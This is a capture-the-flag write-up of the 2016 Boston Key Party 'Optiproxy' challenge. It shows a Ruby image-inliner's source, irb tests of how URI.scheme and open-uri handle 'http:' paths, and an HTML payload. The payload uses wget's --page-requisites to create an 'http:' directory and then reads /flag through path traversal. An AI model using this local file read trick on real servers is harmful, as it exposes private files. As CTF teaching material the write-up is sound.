After I completed SimpleCalc, I wasted way too much time on ComplexCalc and didn’t solve it ( I was so close, I just missed something really obvious). On the last day I only had a couple hours left so I decided to tackle something that shouldn’t be too difficult and that ended up being Optiproxy.
You can find the challenge materials over at http://captf.com/2016/bostonkeyparty/18-optiproxy/
Here’s the source of the Ruby script:
require 'nokogiri'
require 'open-uri'
require 'sinatra'
require 'shellwords'
require 'base64'
require 'fileutils'
set :bind, "0.0.0.0"
cdir = Dir.pwd
get '/' do
str = "welcome to the automatic resource inliner, we inline all images"
str << " go to /example.com to get an inlined version of example.com"
str << " flag is in /flag"
str << " source is in /source"
str
end
get '/source' do
IO.read cdir + "/" + $0
end
get '/flag' do
str = "I mean, /flag on the file system... If you're looking here, I question"
str << " your skills"
str
end
get '/:url' do
url = params[:url]
main_dir = Dir.pwd
temp_dir = ""
dir = Dir.mktmpdir "inliner"
Dir.chdir dir
temp_dir = dir
exec = "timeout 2 wget -T 2 --page-requisites #{Shellwords.shellescape url}"
`#{exec}`
my_dir = Dir.glob ("**/")
Dir.chdir my_dir[0]
index_file = "index.html"
html_file = IO.read index_file
doc = Nokogiri::HTML(open(index_file))
doc.xpath('//img').each do |img|
header = img.xpath('preceding::h2[1]').text
image = img['src']
img_data = ""
uri_scheme = URI(image).scheme
begin
if (uri_scheme == "http" or uri_scheme == "https")
url = image
else
url = "http://#{url}/#{image}"
end
img_data = open(url).read
b64d = "data:image/png;base64," + Base64.strict_encode64(img_data)
img['src'] = b64d
rescue
# gotta catch 'em all
puts "lole"
next
end
end
FileUtils.rm_rf dir
Dir.chdir main_dir
doc.to_html
end
In a nutshell, what it is supposed to do is provide a service that fetches a webpage of your choosing, along with its dependencies, then inlines the images by using the data scheme and base64 encoding them before returning the results to you.
However, if that was all it did then this wouldn’t be fun at all ;)
As the script tells us, the flag for this challenge is in /flag. So we’re definitely either trying to find a remote code execution / command injection vulnerability in the wget command or some sort of local file inclusion.
I saw that the string passed to the wget was escaped and I wasn’t feeling up to playing guessing games with the shell and multibyte characters so I decided to focus on the later part of the code.
I started playing around with the scheme function that was being called on the image URI’s.
─Rikaard@Rikaards-MacBook-Pro ~/ctf/bkp/optiproxy
╰─$ irb
irb(main):001:0> require 'open-uri'
=> true
irb(main):003:0> URI('http://test.com/a.png').scheme
=> "http"
irb(main):004:0> URI('test.com/a.png').scheme
=> nil
irb(main):005:0> URI('http:test.com/a.png').scheme
=> "http"
irb(main):006:0> URI('http://test.com/a.png').scheme
=> "http"
irb(main):007:0> URI('http//test.com/a.png').scheme
=> nil
From this, it was easy to see that all the scheme function cared about was everything up to the ‘:’.
This made me wonder because since anything starting with http:
or https:
would pass the if (uri_scheme == "http" or uri_scheme == "https")
check but something like ‘http:test’ is a valid filename.
Next I decided to find out how open
would treat my crafted URI.
─Rikaard@Rikaards-MacBook-Pro ~/ctf/bkp/optiproxy
╰─$ irb 255 ↵
irb(main):001:0> require 'open-uri'
=> true
irb(main):003:0> open('http://google.com')
=> #<Tempfile:/var/folders/rb/htyhscy144vbtk1n390ps02w0000gn/T/open-uri20160309-55029-siep5z>
irb(main):004:0> open('http:google.com')
Errno::ENOENT: No such file or directory - http:google.com
Awesome :D
So at this point, I could definitely trick it into reading a local file… as long as it was in the current directory and started with http:
…. XD
Not all that useful right about now. It was at this point that I started googling a bit and I found this awesome little article by Egor Homakov ( who I dub Websec Jeezus ).
http://sakurity.com/blog/2015/02/28/openuri.html
When I read this line,
Looks good, but if you manage to create a folder called “http:”, the attacker can read local files with http:/../../../../../etc/passwd
everything became obvious.
Since the wget
had the --page-requisites
flag passed to it, it should be recreating the directory structure of the page it was fetching. Therefore, by linking to a resource in a directory ./http:
I should be able to create a directory called http:
on the remote server allowing me to pull off a local file inclusion.
So I created an index.html
file and hosted it on one of my servers.
<html>
<body>
<img src="./http:/cat2.jpg">
<img src="http:/../../../../../../../../../../../../../flag">
</body>
</html>
When I viewed the source after letting Optiproxy inline it, I saw this.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<body>
<img src="data:image/png;base64....reallylong">
<img src="">
</body>
</html>
I decoded UklLe2V4YW1wbGVmbGFnfQo=
echo -ne 'UklLe2V4YW1wbGVmbGFnfQo=' | base64 -d
RIK{exampleflag}
And there was the flag :)